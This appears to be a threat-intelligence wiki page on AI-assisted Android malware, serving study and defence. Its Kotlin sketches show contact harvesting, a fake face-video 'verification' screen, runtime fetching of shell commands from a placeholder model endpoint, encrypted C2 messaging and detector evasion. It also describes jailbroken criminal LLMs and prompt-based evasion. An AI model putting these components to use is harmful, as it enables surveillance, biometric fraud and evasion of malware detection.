AI-Assisted Malware¶
Large language models and generative AI are being integrated into the Android malware lifecycle at multiple stages: code generation, social engineering, biometric fraud, and evasion of ML-based detectors. The impact so far is more about lowering the skill barrier and accelerating development than creating fundamentally new capabilities, but runtime AI integration and deepfake-based biometric fraud represent genuinely novel attack vectors.
See also: Phishing Techniques, Play Store Evasion, C2 Communication
Distinguishing Hype from Reality¶
Recorded Future introduced the "AI Malware Maturity Model" (AIM3) to classify what genuinely counts as AI malware. Under that lens, most current usage treats LLMs as a "force multiplier" for existing workflows: OpenAI stated in its October 2024 threat report that "the use of ChatGPT has not led to any significant breakthroughs in malware creation." The distinction between AI-assisted and AI-native malware matters, and most of what has been observed is the former.
Categories¶
1. LLM-Assisted Malware Development¶
Threat actors using ChatGPT, Gemini, or underground alternatives to write, debug, and refine malware code.
STORM-0817: Iranian APT Using ChatGPT for Android Surveillanceware
OpenAI disclosed in October 2024 that STORM-0817, an Iran-based threat actor, used ChatGPT to debug and develop Android malware. The malware was described as "relatively rudimentary" surveillanceware collecting contacts, call logs, installed packages, screenshots, browsing history, location, and files from external storage. The actor developed two Android packages (com.example.myttt and com.mihanwebmaster.ashpazi) and used ChatGPT to build server-side C2 code on a WAMP stack with the domain stickhero[.]pro.
OpenAI assessed that ChatGPT did not provide capabilities beyond what was already publicly available. BleepingComputer and SC Media covered the disclosure.
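For context on what "relatively rudimentary" means here: every data type listed above is reachable through documented Android APIs once the corresponding runtime permission is granted. The sketch below is purely illustrative (all names are hypothetical, and nothing is exfiltrated), showing the kind of contacts dump this class of surveillanceware boils down to:

```kotlin
// Illustrative sketch only: the collection OpenAI describes maps onto
// ordinary, documented Android APIs. All names here are hypothetical.
import android.content.ContentResolver
import android.provider.ContactsContract
import org.json.JSONArray
import org.json.JSONObject

// Dump display names and numbers via the public ContactsContract provider.
// Requires the READ_CONTACTS runtime permission, which the user must grant.
fun dumpContacts(resolver: ContentResolver): JSONArray {
    val out = JSONArray()
    val cursor = resolver.query(
        ContactsContract.CommonDataKinds.Phone.CONTENT_URI,
        arrayOf(
            ContactsContract.CommonDataKinds.Phone.DISPLAY_NAME,
            ContactsContract.CommonDataKinds.Phone.NUMBER
        ),
        null, null, null
    ) ?: return out
    cursor.use { c ->
        while (c.moveToNext()) {
            out.put(JSONObject().apply {
                put("name", c.getString(0))
                put("number", c.getString(1))
            })
        }
    }
    return out
}
```

An LLM debugging code at this level is accelerating boilerplate, not unlocking new capability, which is consistent with OpenAI's assessment.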
HP Wolf Security: AI-Generated Malware
In September 2024, HP Wolf Security identified a campaign targeting French-speaking users with VBScript and JavaScript that showed strong indicators of generative-AI authorship: structured comments explaining each line, native-language variable names, and consistent formatting. The malware deployed AsyncRAT. HP characterized this as one of the first documented in-the-wild cases of AI-generated malware.
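Those indicators are stylometric, so they lend themselves to crude scoring heuristics. The toy below is an assumption on our part, not HP's methodology; the markers, thresholds, and weights are invented for illustration:

```kotlin
// Toy stylometric score inspired by HP Wolf Security's published indicators.
// The markers, thresholds, and weights are assumptions, not HP's method.
fun aiAuthorshipScore(script: String): Double {
    val lines = script.lines().filter { it.isNotBlank() }
    if (lines.isEmpty()) return 0.0
    // Indicator 1: high comment density ("comments explaining each line").
    // Covers JS (//) and VBScript (' / REM) comment syntax.
    val commentDensity = lines.count {
        val t = it.trimStart()
        t.startsWith("//") || t.startsWith("'") || t.startsWith("REM ", ignoreCase = true)
    }.toDouble() / lines.size
    // Indicator 2: uniform indentation (generated code is consistently formatted).
    val indentLevels = lines.map { line -> line.takeWhile { it == ' ' }.length }.distinct().size
    return commentDensity + if (indentLevels <= 4) 0.2 else 0.0
}
```

A real triage pipeline would treat a score like this as one weak signal among many, since hand-written tutorial code shares the same traits.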
2. Deepfake Biometric Fraud¶
The most impactful AI-driven mobile attack vector to date: stealing facial biometric data and using AI face-swapping to bypass bank facial recognition.
GoldPickaxe: Facial Biometric Theft
Group-IB disclosed in February 2024 that GoldPickaxe, developed by Chinese-speaking threat group GoldFactory, steals facial biometric data on both Android and iOS to generate deepfakes for bypassing bank facial recognition.
| Aspect | Detail |
|---|---|
| Targets | Thailand, Vietnam banking apps |
| Disguise | Government service apps (Thai "Digital Pension" app) |
| Collection | Prompts victim to record video: blink, smile, face left/right, nod, open mouth |
| Usage | AI face-swapping services create deepfakes to log into victim's banking app |
| Confirmation | Thai police confirmed criminals using captured face scans to bypass banking facial recognition |
This represents a genuine paradigm shift: the malware itself is relatively simple (record video, exfiltrate), but the AI backend (deepfake generation) enables a novel attack that didn't previously exist.
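The collection step itself needs nothing exotic: a fake "verification" screen drives the stock camera while on-screen text walks the victim through the liveness gestures in the table above. A minimal Kotlin sketch follows; every string and identifier is hypothetical, and no exfiltration is shown:

```kotlin
// Illustrative sketch of the collection step: a fake "identity verification"
// flow that records the victim performing liveness gestures. All names and
// strings are hypothetical; nothing is sent anywhere.
import android.app.Activity
import android.content.Intent
import android.provider.MediaStore
import android.widget.Toast

const val REQUEST_FACE_VIDEO = 1001

fun startFakeVerification(activity: Activity) {
    // Same gesture script Group-IB describes: blink, smile, turn, nod, open mouth.
    Toast.makeText(
        activity,
        "Identity check: blink, smile, turn your head left and right, then open your mouth",
        Toast.LENGTH_LONG
    ).show()
    val intent = Intent(MediaStore.ACTION_VIDEO_CAPTURE).apply {
        putExtra(MediaStore.EXTRA_DURATION_LIMIT, 15) // seconds of face video
    }
    activity.startActivityForResult(intent, REQUEST_FACE_VIDEO)
    // In the real campaign the recorded clip is exfiltrated and fed to an
    // off-device face-swap service; that is where the novelty lives.
}
```

The division of labor is the point: trivial on-device code, with all the AI sophistication server-side.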
AI Voice Cloning in Mobile Vishing
Voice phishing surged 442% in 2025, and Group-IB documented AI voice cloning in social-engineering attacks delivered over mobile calls. Modern AI speech models can build a realistic impersonation from seconds of target audio, and Asia-Pacific saw a 194% surge in deepfake-related fraud attempts in 2024 versus 2023. No public reports document Android malware that autonomously conducts voice cloning; the current model is attackers using separate AI tools and then calling victims on their phones.
3. Underground Malicious LLM Tools¶
Custom, jailbroken, and fine-tuned models sold on underground forums for generating phishing content and malware code.
| Tool | First Seen | Base Model | Price | Status |
|---|---|---|---|---|
| WormGPT | July 2023 | GPT-J 6B | ~60 EUR/month, $220 lifetime | Active. New variants on Grok and Mixtral (2024-2025) |
| FraudGPT | July 2023 | Unknown | $90-200/month, $1,700/year | Sold by "CanadianKingpin12" on dark web. LevelBlue coverage |
| KawaiiGPT | July 2025 | Open-source | Free (GitHub) | Unit 42 calls it "entry-level but effective" |
KrebsOnSecurity profiled the WormGPT developer. The original version underperformed expectations (described as "pretty lame" by users). The real significance is the trend: commoditizing AI-assisted cybercrime tools that remove technical barriers for low-skill operators.
DarkBERT
DarkBERT is a legitimate academic project: a BERT-based model pre-trained on 2.2 TB of Tor dark web data for cybersecurity research (classifying ransomware leak sites, detecting information leaks). Claims of malicious derivatives (DarkBART) appeared on underground forums but remain largely unverified.
4. Runtime AI Integration¶
Malware that makes LLM API calls during execution to modify its own behavior.
Google Threat Intelligence Group cataloged five malware families with runtime AI integration in its November 2025 report (The Hacker News coverage); four of them are summarized below:
| Family | Mechanism | Detail |
|---|---|---|
| PROMPTFLUX | Gemini 1.5 Flash API | VBScript malware queries Gemini to rewrite its own source code hourly. "Thinking Robot" component instructs the LLM to act as an "expert VB Script obfuscator." Self-propagates via Windows Startup folder. |
| PROMPTLOCK | AI-generated payloads | Experimental ransomware using AI to generate Lua encryption payloads at runtime. Targets Windows, macOS, Linux. |
| PROMPTSTEAL | Hugging Face API | Queries Qwen2.5-Coder-32B-Instruct to generate system reconnaissance commands. Used by Russian actor APT28 in Ukraine. |
| FRUITSHELL | Hardcoded prompts | PowerShell reverse shell designed to bypass LLM-based security analysis tools. |
These are not Android-specific but represent the state of the art in AI-integrated malware. The techniques (polymorphic code rewriting via LLM, AI-generated payloads, prompt-based evasion) are transferable to mobile.
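To make that transferability concrete: the pattern GTIG describes reduces to an ordinary HTTPS call at runtime, i.e. send a prompt, receive code or commands, act on the response. Below is a hypothetical Kotlin sketch of the PROMPTSTEAL-style "ask a hosted model for commands" step; the endpoint, token, and prompt are placeholders, not real IOCs:

```kotlin
// Hypothetical sketch of the runtime pattern GTIG catalogs (PROMPTSTEAL-style):
// query a hosted model for commands at runtime instead of hardcoding them.
// Endpoint, token, and prompt are placeholders, not indicators of compromise.
import java.net.HttpURLConnection
import java.net.URL

fun fetchGeneratedCommands(apiToken: String): String {
    val url = URL("https://inference.example.com/v1/generate") // placeholder
    val body = """{"prompt":"List shell commands to enumerate documents on this host."}"""
    val conn = (url.openConnection() as HttpURLConnection).apply {
        requestMethod = "POST"
        doOutput = true
        setRequestProperty("Authorization", "Bearer $apiToken")
        setRequestProperty("Content-Type", "application/json")
    }
    conn.outputStream.use { it.write(body.toByteArray()) }
    // The families above execute whatever comes back; for defenders, the key
    // property is that the payload logic lives server-side and varies per run.
    return conn.inputStream.bufferedReader().use { it.readText() }
}
```

On Android the same loop is one HttpURLConnection or Retrofit call away, which is why GTIG's findings matter beyond Windows.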
5. AI-Assisted Campaigns¶
EvilAI Campaign (Trend Micro, September 2025): Operators use AI-generated code and social engineering to disguise malware as legitimate applications (PDF editors, AI-enhanced tools), complete with professional interfaces, valid digital signatures, and AES-encrypted C2 communication. One week of monitoring logged 56 incidents in Europe, 29 in the Americas, and 29 across Asia, the Middle East, and Africa.
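The AES-encrypted channel is the most transferable detail and is itself mundane: a few lines of javax.crypto. The construction below (AES-GCM with an IV-prefixed frame) is an assumption for illustration, not Trend Micro's description of EvilAI's actual scheme:

```kotlin
// Sketch of an AES-GCM-wrapped C2 message. Assumption-level illustration:
// Trend Micro reports AES-encrypted C2, not this exact construction.
import java.security.SecureRandom
import javax.crypto.Cipher
import javax.crypto.spec.GCMParameterSpec
import javax.crypto.spec.SecretKeySpec

fun sealC2Message(key: ByteArray, plaintext: ByteArray): ByteArray {
    val iv = ByteArray(12).also { SecureRandom().nextBytes(it) }
    val cipher = Cipher.getInstance("AES/GCM/NoPadding")
    cipher.init(Cipher.ENCRYPT_MODE, SecretKeySpec(key, "AES"), GCMParameterSpec(128, iv))
    // Prefix the IV so the receiver can decrypt. To network inspection the
    // result is opaque bytes, which is the operational point of the wrapper.
    return iv + cipher.doFinal(plaintext)
}
```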
FunkSec (Check Point, January 2025): Ransomware-as-a-service with an AI-assisted Rust-based encryptor. 85+ claimed victims in its first month. Check Point assessed the codebase organization indicated AI assistance that enabled "rapid iteration despite the author's apparent lack of technical expertise."
Adversarial ML Against Android Malware Detectors¶
Academic research demonstrates how machine learning can be turned against ML-based Android malware detection systems. These are proof-of-concept attacks, not observed in the wild, but they indicate the theoretical ceiling; a toy sketch of the evasion loop they share follows the table.
| Paper | Venue | Year | Technique | Evasion Rate |
|---|---|---|---|---|
| Automated Mass Malware Factory | NDSS | 2025 | Adversarial piggybacking: malicious rider extraction + adversarial perturbation + benign carrier selection | 88.3% vs Drebin/MaMaDroid, 76-92% vs commercial engines |
| GEAAD | Nature Scientific Reports | 2025 | DOpGAN (dual-opponent GAN) altering opcode distribution features | Misclassifies malware as benign |
| EvadeDroid | Computers & Security | 2023 | Black-box evasion via problem-space transformations from benign donors | 80-95% with 1-9 queries |
| LAMLAD | arXiv | 2024 | Dual-agent LLM (manipulator + analyzer) bypassing ML classifiers | Up to 97% in 3 attempts |
| RL-based evasion | Alexandria Engineering Journal | 2024 | GANs + PPO reinforcement learning generating adversarial payloads | 53.84% vs gradient-boosted decision trees |
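Despite the different venues and models, the black-box attacks above share one loop: mutate the app in the problem space (graft in benign code, permissions, or API calls from donor apps), re-query the detector, and keep mutations that lower the malice score. Below is a toy feature-space version of that greedy loop; the scoring lambda stands in for a real classifier, and a real attack mutates the APK itself rather than a feature vector:

```kotlin
// Toy greedy black-box evasion loop in the spirit of EvadeDroid: flip binary
// features toward a benign donor's profile while the detector's score drops.
// The score function is a stand-in for a real ML classifier.
fun evade(
    sample: BooleanArray,             // Drebin-style binary feature vector
    donor: BooleanArray,              // feature profile of a benign app
    score: (BooleanArray) -> Double,  // black-box detector; higher = more malicious
    threshold: Double = 0.5,
    maxQueries: Int = 50
): BooleanArray {
    val current = sample.copyOf()
    var best = score(current)
    var queries = 1
    for (i in donor.indices) {
        if (queries >= maxQueries || best < threshold) break
        if (current[i] == donor[i]) continue
        current[i] = donor[i]        // candidate problem-space transformation
        val s = score(current)
        queries++
        if (s < best) best = s       // keep mutations that reduce the score
        else current[i] = !donor[i]  // revert a mutation that did not help
    }
    return current
}
```

The 1-9 query budgets EvadeDroid reports correspond to tightening maxQueries; the published attacks add search strategy and validity checks that keep the transformed app installable and functional.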
Vendor Reports¶
| Report | Organization | Date | Key Finding |
|---|---|---|---|
| Influence and Cyber Operations | OpenAI | October 2024 | 20+ instances of threat actor misuse including STORM-0817 Android malware |
| Disrupting Malicious Uses | OpenAI | February 2025 | Continued fraud schemes and state-sponsored abuse documentation |
| AI Security Report 2025 | Check Point | April 2025 | AI used across entire cyber attack lifecycle from code generation to campaign optimization |
| Advances in Threat Actor Usage | Google GTIG | November 2025 | Novel AI-enabled malware families (PROMPTFLUX, PROMPTLOCK) with runtime LLM calls |
| The Dual-Use Dilemma | Unit 42 | 2025 | Underground forums selling custom, jailbroken, and open-source AI hacking tools |
| 2024 Phishing Intelligence Report | SlashNext | 2024 | Credential phishing attacks increased 703% in H2 2024; AI a key driver |
What Is Confirmed vs. Theoretical¶
| Status | Category |
|---|---|
| Observed in the wild | LLM-assisted malware code writing (STORM-0817, HP Wolf Security AsyncRAT) |
| Observed in the wild | Facial biometric theft for deepfake banking fraud (GoldPickaxe) |
| Observed in the wild | Underground malicious LLM tools sold and used (WormGPT, FraudGPT, KawaiiGPT) |
| Observed in the wild | Runtime LLM integration in malware (PROMPTFLUX, PROMPTLOCK, PROMPTSTEAL) |
| Observed in the wild | AI-generated phishing at scale (703% increase in credential phishing) |
| Academic PoC only | GAN/RL-based adversarial attacks against Android malware ML detectors |
| Unverified | DarkBERT malicious derivatives |
| Not yet observed | Android malware autonomously conducting AI voice cloning attacks |